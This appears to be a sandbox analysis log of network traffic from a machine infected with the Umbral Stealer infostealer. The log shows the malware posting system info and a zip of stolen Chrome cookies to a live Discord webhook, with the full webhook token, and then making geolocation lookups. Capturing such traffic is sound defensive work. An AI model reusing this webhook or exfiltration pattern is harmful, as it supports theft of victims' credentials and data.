                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.242085
                                      2024-09-06 23:48:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      36 | 192.168.2.5 | 49771 | 162.159.135.232 | 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:19 UTC | 360 | OUT | POST /api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9 HTTP/1.1
                                      Accept: application/json
                                      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                      Content-Type: application/json; charset=utf-8
                                      Host: discord.com
                                      Content-Length: 941
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:19 UTC | 25 | IN | HTTP/1.1 100 Continue
                                      2024-09-06 23:48:19 UTC | 941 | OUT | Data Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 40 65 76 65 72 79 6f 6e 65 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 55 6d 62 72 61 6c 20 53 74 65 61 6c 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 2a 2a 5f 5f 53 79 73 74 65 6d 20 49 6e 66 6f 5f 5f 2a 2a 5c 72 5c 6e 60 60 60 61 75 74 6f 68 6f 74 6b 65 79 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4e 61 6d 65 3a 20 39 32 37 35 33 37 5c 72 5c 6e 43 6f 6d 70 75 74 65 72 20 4f 53 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 72 5c 6e 54 6f 74 61 6c 20 4d 65 6d 6f 72 79 3a 20 34 20 47 42 5c 72 5c 6e 55 55 49 44 3a 20 32 45 44 39 32 37 34 32 2d 38 39 44 43 2d 44 44 37 32 2d 39 32 45 38 2d 38 36 39 46 41 35 41 36 36 34 39 33 5c 72 5c 6e 43 50 55 3a 20 49 6e
                                      Data Ascii: {"content":"@everyone","embeds":[{"title":"Umbral Stealer","description":"**__System Info__**\r\n```autohotkey\r\nComputer Name: 927537\r\nComputer OS: Microsoft Windows 10 Pro\r\nTotal Memory: 4 GB\r\nUUID: 2ED92742-89DC-DD72-92E8-869FA5A66493\r\nCPU: In
                                      2024-09-06 23:48:19 UTC | 1369 | IN | HTTP/1.1 204 No Content
                                      Date: Fri, 06 Sep 2024 23:48:19 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      set-cookie: __dcfduid=7e94daf06caa11efabb97ad25800c058; Expires=Wed, 05-Sep-2029 23:48:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1725666500
                                      x-ratelimit-reset-after: 1
                                      via: 1.1 google
                                      alt-svc: h3=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JuJ0zFKGDU6yIDE6es9Cu3v6Jrkfnnc9GyWuoaj%2FrWVmRroxh%2FQJR2Z2E1jiP6kjYP97f%2BLjgocZq1PxxYB3b7E4P9VKAqCKgeSSRDHwqQt7iLDLJ4D3509B7hbH"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                      Set-Cookie: __sdcfduid=7e94daf06caa11efabb97ad25800c058b9c0b9de442cc4ef84a2bd6075eea9287b7684b074dc12047e96f5f10bd1a1ff; Expires=Wed, 05-Sep-2029 23:48:19 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      Set-Cookie: __cfruid=84b80910d66750df07d9d462aac5548a7cfc284a-1725666499; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      Set-Cookie: _cf
                                      2024-09-06 23:48:19 UTC | 196 | IN | Data Raw: 75 76 69 64 3d 41 78 46 70 73 4e 56 51 7a 61 6a 43 45 36 68 4b 4a 78 61 42 34 77 58 73 57 68 73 31 30 67 68 4f 38 54 36 49 59 74 32 48 70 75 38 2d 31 37 32 35 36 36 36 34 39 39 35 38 33 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 62 66 32 35 39 36 34 65 63 65 65 34 33 35 63 2d 45 57 52 0d 0a 0d 0a
                                      Data Ascii: uvid=AxFpsNVQzajCE6hKJxaB4wXsWhs10ghO8T6IYt2Hpu8-1725666499583-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8bf25964ecee435c-EWR


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      37 | 192.168.2.5 | 49772 | 162.159.135.232 | 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:20 UTC | 684 | OUT | POST /api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9 HTTP/1.1
                                      Accept: application/json
                                      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                      Content-Type: multipart/form-data; boundary="2410dd78-6e8d-4692-be60-eb2fd347f134"
                                      Host: discord.com
                                      Cookie: __dcfduid=7e94daf06caa11efabb97ad25800c058; __sdcfduid=7e94daf06caa11efabb97ad25800c058b9c0b9de442cc4ef84a2bd6075eea9287b7684b074dc12047e96f5f10bd1a1ff; __cfruid=84b80910d66750df07d9d462aac5548a7cfc284a-1725666499; _cfuvid=AxFpsNVQzajCE6hKJxaB4wXsWhs10ghO8T6IYt2Hpu8-1725666499583-0.0.1.1-604800000
                                      Content-Length: 373782
                                      Expect: 100-continue
                                      2024-09-06 23:48:20 UTC | 25 | IN | HTTP/1.1 100 Continue
                                      2024-09-06 23:48:20 UTC | 40 | OUT | Data Raw: 2d 2d 32 34 31 30 64 64 37 38 2d 36 65 38 64 2d 34 36 39 32 2d 62 65 36 30 2d 65 62 32 66 64 33 34 37 66 31 33 34 0d 0a
                                      Data Ascii: --2410dd78-6e8d-4692-be60-eb2fd347f134
                                      2024-09-06 23:48:20 UTC | 140 | OUT | Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 55 6d 62 72 61 6c 2d 39 32 37 35 33 37 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 55 6d 62 72 61 6c 2d 39 32 37 35 33 37 2e 7a 69 70 0d 0a 0d 0a
                                      Data Ascii: Content-Type: application/zipContent-Disposition: form-data; name=file; filename=Umbral-927537.zip; filename*=utf-8''Umbral-927537.zip
                                      2024-09-06 23:48:20 UTC | 16355 | OUT | Data Raw: 50 4b 03 04 14 00 00 08 08 00 07 9e 26 59 1f 2a 43 8d ed 00 00 00 21 01 00 00 23 00 00 00 42 72 6f 77 73 65 72 73 5c 43 6f 6f 6b 69 65 73 5c 43 68 72 6f 6d 65 20 43 6f 6f 6b 69 65 73 2e 74 78 74 7d cc 4b 72 82 30 00 00 d0 75 9c f1 28 a1 09 21 a4 5d 74 01 2d 08 34 02 ca 6f 60 d3 01 a2 a0 83 32 7c 1a 94 d3 77 a6 07 e8 3b c0 53 9a be 6f ba 93 52 f7 37 10 1f 13 0b bc 00 db e0 91 05 30 21 1a d1 de 54 0d 53 a6 23 5d 27 00 87 df 9e 71 04 2a 52 09 c4 08 22 0d 62 b2 dd 28 ff 04 54 67 18 eb 7f 01 43 0c f8 ee 27 a0 18 bf 5b 67 2a 43 7b b7 c0 7d 91 f7 b4 5d 4e 10 c5 ad 91 4e 5d f5 a8 6e 52 a4 c5 52 3b f7 21 5d 33 c7 48 b0 26 29 d9 fb 38 95 8b 3c 0c af 55 99 9f 1b 15 ba c6 3c 14 66 4a fd 80 d3 51 5e 55 3f 73 87 71 25 8c 25 2d 17 ce 1c 34 16 9c bd d2 ec 12 33 f7 ac f6
                                      Data Ascii: PK&Y*C!#Browsers\Cookies\Chrome Cookies.txt}Kr0u(!]t-4o`2|w;SoR70!TS#]'q*R"b(TgC'[g*C{}]NN]nRR;!]3H&)8<U<fJQ^U?sq%%-43
                                      2024-09-06 23:48:20 UTC | 16355 | OUT | Data Raw: 20 4c 9f 22 d6 77 ac 08 5c 21 33 f7 87 94 72 c9 e3 4d d2 c2 98 a4 a9 a2 96 e0 45 06 c9 5c 54 fb 45 25 05 2e ba a4 08 23 64 ce a4 9b 4f 37 64 bc dc b6 75 7e c4 1b 74 f3 03 b7 b3 74 b4 62 29 a3 58 c0 84 7a fc bd 7c bc 61 36 70 21 9a 90 11 56 2c f0 21 31 44 25 62 43 0e 5f 07 e2 95 6d 97 89 b8 63 44 9c f5 40 da 56 11 5e e7 11 9d 2f 2a 87 56 c7 4f 63 dc e4 fd cb 45 b7 44 6f e9 84 5e a1 1f 31 5e 8e 7e 93 2f a7 2b 60 64 ae df 76 51 e8 6a bd c9 5b 19 ec 5e dc 69 ed 54 fd ba da 34 0e 3a a9 6d 6e a1 96 96 29 a4 4d bf 86 2f 33 c1 6b 48 c4 27 e5 11 71 3f 44 7f 2a 93 3f ad 79 aa e4 34 ae d0 dd 92 92 c8 c7 f4 14 51 27 ae bf fb aa 71 c0 69 ee 34 11 33 36 4c 1c a0 49 e2 86 54 37 db cf 00 8e 88 dd 83 40 dd e9 35 71 67 d6 a3 b3 e7 3d ab b2 ab 5a ce 1e 68 6b 99 ad 7f 19 6a
                                      Data Ascii: L"w\!3rME\TE%.#dO7du~ttb)Xz|a6p!V,!1D%bC_mcD@V^/*VOcEDo^1^~/+`dvQj[^iT4:mn)M/3kH'q?D*?y4Q'qi436LIT7@5qg=Zhkj
                                      2024-09-06 23:48:20 UTC | 16355 | OUT | Data Raw: 12 ed e1 ad 72 c7 6d c2 55 b2 9c 0c c6 44 52 f9 46 af 1c 87 de 50 b6 c5 a9 48 53 1b 6e 0c c8 e6 12 1c 81 c8 80 f8 30 d1 04 e9 6d d0 5e ec c8 2b 79 26 5a b6 cb 7c 90 b5 2a b0 2c 9b 85 63 75 c8 ff 50 d6 54 f8 e3 df f6 b4 04 79 6d b1 2d b1 b3 c1 d7 c0 f4 33 f6 a5 52 df 52 5e 75 69 75 ab 53 24 4c a3 9a ec 2f f1 19 9e 1e fc c5 28 e5 1b e0 1d d0 0a 68 4b f8 5e 6d a7 26 99 91 e3 7f e8 ac c5 b2 e6 2c 09 b2 73 42 c1 ab 9a 66 47 a6 45 ec 24 3f 3a b0 a1 75 ac 17 77 81 49 6e cc 68 ed df 4a 08 d9 aa 28 b4 80 a1 56 6d b8 e8 0f 1d 95 a4 f4 fd 1c 83 fd 01 15 02 71 59 c0 82 cd f6 61 23 ac 2e 3d 35 9e c8 ff eb 40 f5 66 13 fc 9c fc 52 27 24 29 78 60 ba ad 53 5a ea db 4c 6a d5 e6 ca e8 8f c9 a9 77 d2 62 77 4d c2 4f a3 3d da d3 f2 ea 77 6b 50 bb 88 23 df 1a 20 8d 0a 09 06 27
                                      Data Ascii: rmUDRFPHSn0m^+y&Z|*,cuPTym-3RR^uiuS$L/(hK^m&,sBfGE$?:uwInhJ(VmqYa#.=5@fR'$)x`SZLjwbwMO=wkP# '
                                      2024-09-06 23:48:20 UTC | 16355 | OUT | Data Raw: 07 fa 1e 0f 2e bf f2 8b af ec 79 40 c5 a3 88 9d ba 66 7d 1c 00 51 2d 47 00 ea 4f 8b f6 ea a2 d5 3f 61 9b f9 54 0f 7d 16 c8 51 00 ea 5d d1 73 94 03 f4 f8 a3 7e 40 ef 7a b1 b5 ff 86 92 33 71 90 d0 c4 36 65 e4 39 4b b8 ef de 9c 0e 4d be fe ef 2b fe 3a 4f 80 55 a0 09 e0 36 45 a6 fb 3c 37 e1 14 ee e1 00 e8 2b 20 84 3b da 5a 9e 8d b1 40 1b c7 cb 2f 14 1d e0 3c 9d a5 2b 3f 0c dd 14 42 89 f2 6b 8f 69 ba a1 6c 75 8c 2f 15 ad 8d 91 59 53 5d 3c 87 2e 36 34 14 f1 89 49 bb 14 c9 ee ce f4 f5 d2 78 25 a3 ae 5c c3 c9 5d ba de f5 20 24 e5 cb cf 0d da a1 85 83 a5 6d 87 5d 79 61 69 70 95 4a 32 cf 2b 29 9e 23 7c 7c de 82 85 21 c4 db a2 8a f5 93 3c d5 1b 14 b9 5c 80 52 df d1 a1 b8 04 42 9e 20 bf cf c4 14 77 3a de 1a f1 c2 ad fd 71 2e 14 49 3e f3 15 b0 43 c9 e8 03 e1 86 fd 16
                                      Data Ascii: .y@f}Q-GO?aT}Q]s~@z3q6e9KM+:OU6E<7+ ;Z@/<+?Bkilu/YS]<.64Ix%\] $m]yaipJ2+)#||!<\RB w:q.I>C
                                      2024-09-06 23:48:20 UTC | 16355 | OUT | Data Raw: de e2 40 30 ba 1f 88 1e 10 eb 0c 10 70 45 2b 47 1c 35 ef 31 2d 0a 3f 06 44 a1 50 ac b1 5f 8f 9f a5 93 73 72 cd 84 3a 9d e0 3b 99 03 82 79 19 5a e3 f2 ff 39 91 e7 4e d9 30 68 db a5 70 fc ba c2 9a e4 cb 4d ea 9f 73 c9 06 b0 e0 f7 d3 a3 24 78 fa 67 80 c5 34 24 44 34 09 c6 57 3d 6a f3 1f de dc 00 4f a2 a5 e4 36 12 06 70 1c 8e 8b 07 cb 01 3c 76 b5 db 38 21 5e b0 86 c5 b4 3d f5 1a 0e 73 1d d3 63 4d 19 01 ae 08 21 3a eb 0f 80 ec 21 cb b8 6b 67 e6 e4 45 aa fc 56 af 66 a4 95 30 c1 4a c4 bb 7b 0a 89 e5 13 da 56 97 fa 98 ff 63 98 cd b6 35 a5 7c 6c d1 ae b8 93 69 26 15 60 89 d2 b9 3f 89 56 b3 0b dc d0 1f dd d9 73 05 15 85 75 ef 75 0b 46 ae ea e6 73 37 30 d7 79 1d e1 14 73 cf 6a ba 09 fe 36 eb b7 5f 4d e1 bf a5 50 44 60 da 51 11 78 ed 2a f1 6f c4 aa c4 30 db 74 e9 8f
                                      Data Ascii: @0pE+G51-?DP_sr:;yZ9N0hpMs$xg4$D4W=jO6p<v8!^=scM!:!kgEVf0J{Vc5|li&`?VsuuFs70ysj6_MPD`Qx*o0t
                                      2024-09-06 23:48:20 UTC | 16355 | OUT | Data Raw: 26 5e 5c ee 17 db e5 ea f4 91 55 f8 0a 7f 29 ce 1d 79 4c a9 42 2d 9d ba 6f a9 8b de c1 70 51 d5 23 43 64 85 e1 ac 07 be af 76 e9 34 6d be a0 b3 10 16 cb c6 8b 3f 55 1d 38 df 3a b4 2e 21 cc 76 1a d6 62 9b 20 7e c1 e6 22 23 04 0b ae 48 43 08 2e 8c 07 85 ec 50 ab 17 5b ad 2c 7d 60 88 e8 59 d4 2c 5f fa e5 d0 2b fd 76 3e f3 40 6a 32 84 75 73 c1 cf 30 c9 9f d7 f7 1f 2a 77 94 1b ae 51 cd 79 63 90 54 73 04 cf 34 02 4f c5 7d 49 fb 84 a4 fd 1e 9c 64 fc b3 3f 5f 4f 25 69 dc 37 27 63 5d b3 dd 2f 9d 18 08 ba 7c a2 f1 3b af 5f 7c d5 2e 20 dc 82 24 a7 2f 06 08 ea 4e 50 c5 6c 82 b1 e7 94 b8 a8 b2 b0 ec 6a 7a e8 2c a7 32 50 8c b3 cb 38 a0 8d 16 ce 67 8c 4f fc bc b2 8a 83 0f 8e 2c de fa 3f c9 57 ba 2a 5b 1d 96 8d c2 af fe 9b 80 65 e5 30 12 9a 58 d8 94 e3 3e ad 9c e3 7e e9
                                      Data Ascii: &^\U)yLB-opQ#Cdv4m?U8:.!vb ~"#HC.P[,}`Y,_+v>@j2us0*wQycTs4O}Id?_O%i7'c]/|;_|. $/NPljz,2P8gO,?W*[e0X>~
                                      2024-09-06 23:48:20 UTC | 16355 | OUT | Data Raw: c0 b1 63 44 04 ed 02 d4 9c 52 7a ea aa 5c aa 77 b9 d7 77 db 35 ed a4 54 7b b2 d6 9b 87 ae 4f f0 e0 de 96 dd ab ba 0a d9 f1 fa cf 22 bc 33 54 e8 d0 ca 58 8b 02 bd 29 37 fa 05 d9 11 ff 8b 23 37 e8 35 36 d1 07 3f ac de 00 6a cf f5 19 d1 df 50 87 7d ff 74 16 42 ef d6 95 7f af 7f b4 ef 29 b2 9b 3a f3 da f9 85 b1 89 f5 2d a5 65 25 c0 e8 d7 3f 9c 77 eb 2e 40 ae 48 2f 31 35 9f e0 61 96 73 11 9a 5e a7 7f 9a 7a 22 e5 17 ec 9d e7 af e8 3e 0b 7a e9 f7 65 f9 c5 ba a7 88 56 db d1 f6 28 d2 2d f1 d2 8e 33 a3 5a 8a cf d4 d0 8f 37 92 4b 90 ad 65 f4 33 37 30 a2 5e 2f d1 c7 e8 c7 63 92 cd 93 bd 90 ca dd 6b cf dd dd a4 bb be 0e 58 b7 de 4e 21 50 77 d8 7e a4 33 5e 68 8a 61 b3 0c d8 9c a2 68 f3 12 1b 62 d8 a8 e3 f9 c4 c9 eb 20 a5 66 22 0b 71 ef 0a b2 f3 09 84 83 df 66 62 42 f5
                                      Data Ascii: cDRz\ww5T{O"3TX)7#756?jP}tB):-e%?w.@H/15as^z">zeV(-3Z7Ke370^/ckXN!Pw~3^hahb f"qfbB
                                      2024-09-06 23:48:20 UTC | 16355 | OUT | Data Raw: 4e 10 a4 cb e6 ed 24 6e 97 b6 25 15 27 3c b1 dd 76 ef 08 db 33 fc 6c 3e b6 d8 2a 40 b2 ec aa 31 bb b0 c9 3f b9 b3 10 28 05 7b 35 c1 63 f1 a1 15 1e cd 4e 17 b1 5f 60 49 a1 d3 79 c3 9b 36 7d d8 c5 40 0b 5f 1d a1 d9 b6 09 7e 7f 52 67 33 2a b4 af 3f 23 88 52 51 34 3d ce e4 f7 32 30 72 90 30 50 f7 fd 75 92 e5 b0 fe 9d 41 e5 fa fc 82 e8 ae f7 0b c5 eb 09 88 20 aa f2 7e ff 69 ac 02 df a9 57 d0 e7 f4 17 0c 68 0c dd ed c8 93 ff fb 3e 55 8c 11 ac 21 fa 6a 05 58 8f 7e 98 20 5d c7 e9 57 6d 46 4e e8 85 4a 43 ef 0e 9a 0e 9f 5f 4c dd c6 a2 55 7f 96 9e 62 01 35 f5 14 8e 94 d6 6a 3f 5e 8b 31 81 74 f6 84 c8 ac ba da 68 84 5c 26 4b 74 75 a4 6b 89 31 c0 68 15 17 01 de 0c 78 7f 93 42 d8 db 68 75 80 cd ea 56 13 92 c9 60 35 17 8e 23 fb 95 a0 75 c8 05 4b 50 7f 95 e8 19 7f 93 41
                                      Data Ascii: N$n%'<v3l>*@1?({5cN_`Iy6}@_~Rg3*?#RQ4=20r0PuA ~iWh>U!jX~ ]WmFNJC_LUb5j?^1th\&Ktuk1hxBhuV`5#uKPA
                                      2024-09-06 23:48:21 UTC | 1369 | IN | HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:48:20 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1725666502
                                      x-ratelimit-reset-after: 1
                                      vary: Accept-Encoding
                                      via: 1.1 google
                                      alt-svc: h3=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WjuItcBQy%2BOYoNybsv7Icqitouv%2Bdl%2B42YzyifhOaKuRQ4%2B9tFqibO6gLPU6%2F%2FApQLGonJBznKWENJV32OS412r4eWLSc8iTHgs17TdX2ojyS9fzR7wIO%2BIOP3ka"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                      Server: cloudflare
                                      CF-RAY: 8bf2596a0e1e1815-EWR
                                      40b
                                      {"type":0,"content":"","mentions":[],"mention_roles":[],"attachments":[{"id":"1281762948012052612","filename":"Umbral-927537.zip","size":373558,"url":"https://cdn.discordapp.com/attachments/1277266726186385433/1281762948012052612/Umbral-927537.zip?ex=66dce644&is=66db94c4&hm=dd7d40848de92f6aed351dced1005163d4fb559e959eaf97c149be06ca2d422d&","proxy_url":"https://media.discordapp.net/attachments/1277266726186385433/12817629


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      38 | 192.168.2.5 | 49773 | 188.114.97.3 | 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:20 UTC | 67 | OUT | GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:20 UTC | 641 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:20 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:20 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u5bLm9b8BvthVbRTVKdbgen3D7zYTxD6WwRJg3jOyE3y0CK9LFkMC8K6KHyonnKvTJrW7Ncj13cm%2BT6jYf%2FrF8l3ygPS2Iidw%2F6y7COfqpFI%2FLXg98NsXA5KN9puI9qp"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2596cdc0b180d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:20 UTC | 167 | IN | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      39 | 192.168.2.5 | 49774 | 104.21.85.189 | 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:21 UTC | 64 | OUT | GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:21 UTC | 731 | IN | HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:21 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 33356
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VT8M6SNEAJGP7KF9K2AGK
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hIPDCnXRrF5UFYEaGGNMeOByMnPUGRJCdYS4HiijT3L622POJbuVmZLmXzO0NlQKoaCDDoJqtUqy4QulAu795%2FeCDXtuGMSoFjqZepUKUk0raaDDlDHP0WAVRQL0"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25970b8e4c33e-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:21 UTC | 638 | IN | Data Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:21 UTC1369INData Raw: 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 76 68
                                      Data Ascii: } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100vh
                                      2024-09-06 23:48:21 UTC1082INData Raw: 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34 39 33 36 20
